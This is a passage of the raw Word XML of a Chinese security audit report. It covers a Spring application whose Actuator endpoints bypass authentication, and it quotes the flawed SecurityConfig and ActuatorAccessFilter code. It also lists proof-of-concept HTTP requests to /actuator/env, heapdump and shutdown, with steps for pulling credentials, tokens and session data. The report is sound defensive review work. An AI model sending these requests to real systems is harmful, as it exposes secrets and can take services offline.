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[代码审查] ydwb-CW-20260610-2026-06-12 18:37 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_0" w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>📊 本次审计全景</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>调用链</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：共 1276 条</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：去重后 65 个（原始报告 165 条）（🔴严重 1）（🟠高危 64）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>跨路径命中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：19 个漏洞被多条路径触达 ⚠️（公共 sink，建议优先复核）</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本次变动的 Controller 接口</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>📋 接口清单（含参数详情）已单独成文，避免撑爆本文档：</w:t>
      </w:r>
      <w:hyperlink r:id="rId5">
        <w:r>
          <w:rPr>
            <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
            <w:color w:val="3370ff"/>
            <w:sz w:val="22"/>
          </w:rPr>
          <w:t>查看接口清单文档</w:t>
        </w:r>
      </w:hyperlink>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：ActuatorAccessFilter.java#shouldNotFilter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_2" w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞1：Spring Actuator 管理端点未授权完全暴露</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="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restrictToInternal=false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 时 Actuator 访问过滤器被完全绕过，叠加 SecurityConfig 白名单导致敏感管理端点无任何认证保护</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="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src/main/java/com/gameBack/mjservice/config/ActuatorAccessFilter.java:shouldNotFilter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="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：未授权访问 / 敏感信息泄露</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="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：未授权（完全匿名可访问）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="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系统对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/actuator/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 路径的保护设计为"双层防线"：Spring Security 层将该路径显式加入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>permitAll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 白名单（不做任何身份认证），将全部保护责任下移至 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>ActuatorAccessFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">。但 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>ActuatorAccessFilter.shouldNotFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 中存在一条完全旁路逻辑：当 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>restrictToInternal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 时，该方法直接返回 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，意味着过滤器对所有请求完全跳过，不执行任何访问控制。两层防护叠加失效后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/actuator/env</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（含数据库密码、API 密钥等配置明文）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/actuator/heapdump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（包含内存中全部 token、会话数据）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/actuator/shutdown</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（远程关机）等高危端点对公网完全裸露，无任何鉴权拦截。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="10"/>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11"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SecurityConfig.isPermitPath()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/actuator/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 加入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>PERMIT_MATCHER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，Spring Security 对该路径族不做任何身份验证，控制权完全交给 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>ActuatorAccessFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>ActuatorAccessFilter.shouldNotFilter()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 是该路径唯一的访问控制点。当 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>restrictToInternal == false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>shouldNotFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 直接返回 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>doFilterInternal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 不会被调用，等同于此过滤器对所有请求形同虚设。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>请求直接到达 Spring Actuator 的各端点处理器，无需任何凭证。</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Spring Security 配置：SecurityConfig.java</w:t>
              <w:br/>
              <w:t>// isPermitPath() 方法 — 将 /actuator/** 放入 permitAll 白名单</w:t>
              <w:br/>
              <w:t>private static boolean isPermitPath(String normalizedPath) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (normalizedPath.equals("/actuator") || normalizedPath.startsWith("/actuator/")) return true; // ← /actuator/** 完全免认证</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// PERMIT_MATCHER 直接驱动 SecurityFilterChain 的 permitAll 决策</w:t>
              <w:br/>
              <w:t>private static final RequestMatcher PERMIT_MATCHER = (HttpServletRequest request) -&gt; {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return isPermitPath(normalizedPath); // ← /actuator 命中此处，Spring Security 不做任何身份校验</w:t>
              <w:br/>
              <w:t>};</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② 唯一访问控制层：ActuatorAccessFilter.java</w:t>
              <w:br/>
              <w:t>@Override</w:t>
              <w:br/>
              <w:t>protected boolean shouldNotFilter(HttpServletRequest request) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (!restrictToInternal) return true;  // ← 漏洞点：restrictToInternal=false 时过滤器整体跳过，无任何拦截</w:t>
              <w:br/>
              <w:t xml:space="preserve">    String path = request.getRequestURI();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return path == null || !path.contains("/actuator");</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>// doFilterInternal（IP白名单限制逻辑）因 shouldNotFilter=true 永远不会执行</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场景一：泄露所有环境变量与配置密钥（数据库密码、Redis 密码、JWT 密钥等）</w:t>
              <w:br/>
              <w:t>GET /actuator/env HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;目标服务器&gt;</w:t>
              <w:br/>
              <w:t>Connection: close</w:t>
              <w:br/>
              <w:br/>
              <w:t># 场景二：下载完整 JVM 堆转储（包含内存中所有 Token、会话、明文密码）</w:t>
              <w:br/>
              <w:t>GET /actuator/heapdump HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;目标服务器&gt;</w:t>
              <w:br/>
              <w:t>Connection: close</w:t>
              <w:br/>
              <w:br/>
              <w:t># 场景三：远程关闭应用（需 shutdown endpoint 已启用）</w:t>
              <w:br/>
              <w:t>POST /actuator/shutdown HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;目标服务器&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>Connection: close</w:t>
              <w:br/>
              <w:br/>
              <w:t>{}</w:t>
              <w:br/>
              <w:br/>
              <w:t># 场景四：枚举所有 API 路由映射（辅助进一步攻击）</w:t>
              <w:br/>
              <w:t>GET /actuator/mappings HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;目标服务器&gt;</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Connection: close</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>📝 利用步骤：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">直接以匿名身份（无任何 Token/Cookie）访问 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>GET /actuator/env</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，因 SecurityConfig 的 permitAll 白名单，Spring Security 不做任何鉴权拦截；同时因 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>restrictToInternal=false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>ActuatorAccessFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的 </w:t>
      </w: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，过滤器跳过。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Spring Actuator 的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/env</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 端点返回包含所有 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>PropertySource</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的 JSON，其中包括但不限于：数据库连接 URL/用户名/密码、Redis 密码、JWT 签名密钥、第三方 API Key/Secret、OSS 访问凭证等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="16"/>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GET /actuator/heapdump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 下载 JVM 堆转储文件，通过工具（如 Eclipse Memory Analyzer）分析可提取内存中当前所有活跃用户的 session token、正在处理的业务数据等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">若 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>management.endpoint.shutdown.enabled=true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>POST /actuator/shutdown</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 可直接关闭服务进程，造成服务中断。</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：无需任何身份凭证，返回 HTTP 200，响应体包含系统配置明文或堆转储文件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1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（完全匿名可利用）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限级别：公网任意访问者均可触发，无前置条件</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20"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>自身</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audit_m001_004_shouldNotFilter_ctrl-self.md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：SecurityConfig.java#isPermitPath</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_3" w:id="3"/>
      <w:r>
        <w:rPr>
